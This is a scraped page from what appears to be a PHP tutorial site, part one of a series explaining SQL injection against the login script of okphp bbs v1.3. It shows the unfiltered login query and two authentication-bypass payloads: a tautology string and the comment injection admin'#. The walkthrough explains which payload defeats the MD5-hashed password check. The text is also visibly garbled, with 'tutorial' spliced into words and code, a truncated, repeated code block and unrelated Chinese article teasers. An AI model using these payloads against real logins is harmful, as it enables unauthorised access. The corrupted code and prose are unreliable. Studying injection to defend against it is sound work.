Detailed explanation about sql injection method (1/3)

Home

Backend Development

PHP Tutorial

Detailed explanation about sql injection method (1/3)_PHP tutorial

WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB

Jul 13, 2016 pm 05:09 PM

mysqlphpphp+mysqlsqlaboutreasonandTutorialmethodinjectionofexplaindetailed

Due to the php tutorial and mysql tutorial itself, the injection of php+mysql is more difficult than the asp tutorial, especially the construction of statements during injection. This article mainly borrows some information from okphp bbs v1.3 Let’s briefly analyze the file and talk about the construction method of php+mysql injection statement. I hope this article will be helpful to you.
Statement: All the "vulnerabilities" mentioned in the article have not been tested and may not exist at all. In fact, it does not matter whether there are loopholes. What is important is the analysis ideas and statement structure.
2. "Vulnerability" analysis:
1.admin/login.php injection leads to authentication bypass vulnerability:
Code:

Code

$conn=sql_connect($dbhost, $dbuser, $dbps tutorial wd, $dbname); $password = md5($password); $q = "select id,group_id from $user_table where username='$username' and password='$password'"; $res = sql_query($q,$conn); $row = sql_fetch_row($res); $q = "select id,group_id from $user_table where username='$username' and password ='$password'

Medium
$username and $password are not filtered and can be easily bypassed. (php100 Chinese website)
Methods for modifying statements such as select * from $user_table where username='$username' and password='$password' are:
Construction 1 (using logical operations): $username=' or 'a'='a $password=' or 'a'='a

Equivalent to sql statement:

select * from $user_table where username='' or 'a'='a' and password='' or 'a'='a'

Construction 2 (use the comment statement # in mysql, /* to comment out $password): $username=admin'#(or admin'/*)

That is:

select * from $user_table where username='admin'#' and password='$password'
Equivalent to:

select * from $user_table where username='admin'

The $password in the $q statement in admin/login.php is md5 encrypted before querying, so it cannot be bypassed by the statement in construction 1. Here we use construction 2:

　select id,group_id from $user_table where username='admin'#' and password='$password'"

Equivalent to:

select id,group_id from $user_table where username='admin'

1 2 3

Statement

The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn

SQL Server使用CROSS APPLY与OUTER APPLY实现连接查询Aug 26, 2022 pm 02:07 PM

本篇文章给大家带来了关于SQL的相关知识，其中主要介绍了SQL Server使用CROSS APPLY与OUTER APPLY实现连接查询的方法，文中通过示例代码介绍的非常详细，下面一起来看一下，希望对大家有帮助。

SQL Server解析/操作Json格式字段数据的方法实例Aug 29, 2022 pm 12:00 PM

本篇文章给大家带来了关于SQL server的相关知识，其中主要介绍了SQL SERVER没有自带的解析json函数,需要自建一个函数(表值函数)，下面介绍关于SQL Server解析/操作Json格式字段数据的相关资料，希望对大家有帮助。

聊聊优化sql中order By语句的方法Sep 27, 2022 pm 01:45 PM

如何优化sql中的orderBy语句？下面本篇文章给大家介绍一下优化sql中orderBy语句的方法，具有很好的参考价值，希望对大家有所帮助。

Monaco Editor如何实现SQL和Java代码提示？May 07, 2023 pm 10:13 PM

monacoeditor创建//创建和设置值if(!this.monacoEditor){this.monacoEditor=monaco.editor.create(this._node,{value:value||code,language:language,...options});this.monacoEditor.onDidChangeModelContent(e=>{constvalue=this.monacoEditor.getValue();//使value和其值保持一致i

一文搞懂SQL中的开窗函数Sep 02, 2022 pm 04:55 PM

本篇文章给大家带来了关于SQL server的相关知识，开窗函数也叫分析函数有两类,一类是聚合开窗函数,一类是排序开窗函数,下面这篇文章主要给大家介绍了关于SQL中开窗函数的相关资料,文中通过实例代码介绍的非常详细,需要的朋友可以参考下。

如何在Python中根据运行时修改业务SQL代码？May 08, 2023 pm 02:22 PM

1.缘起最近项目在准备搞SASS化，SASS化有一个特点就是多租户，且每个租户之间的数据都要隔离，对于数据库的隔离方案常见的有数据库隔离，表隔离，字段隔离，目前我只用到表隔离和字段隔离（数据库隔离的原理也是差不多）。对于字段隔离比较简单，就是查询条件不同而已，比如像下面的SQL查询：SELECT*FROMt_demoWHEREtenant_id='xxx'ANDis_del=0但是为了严谨，需求上需要在执行SQL之前检查对应的表是否带上tenant_id的查询字段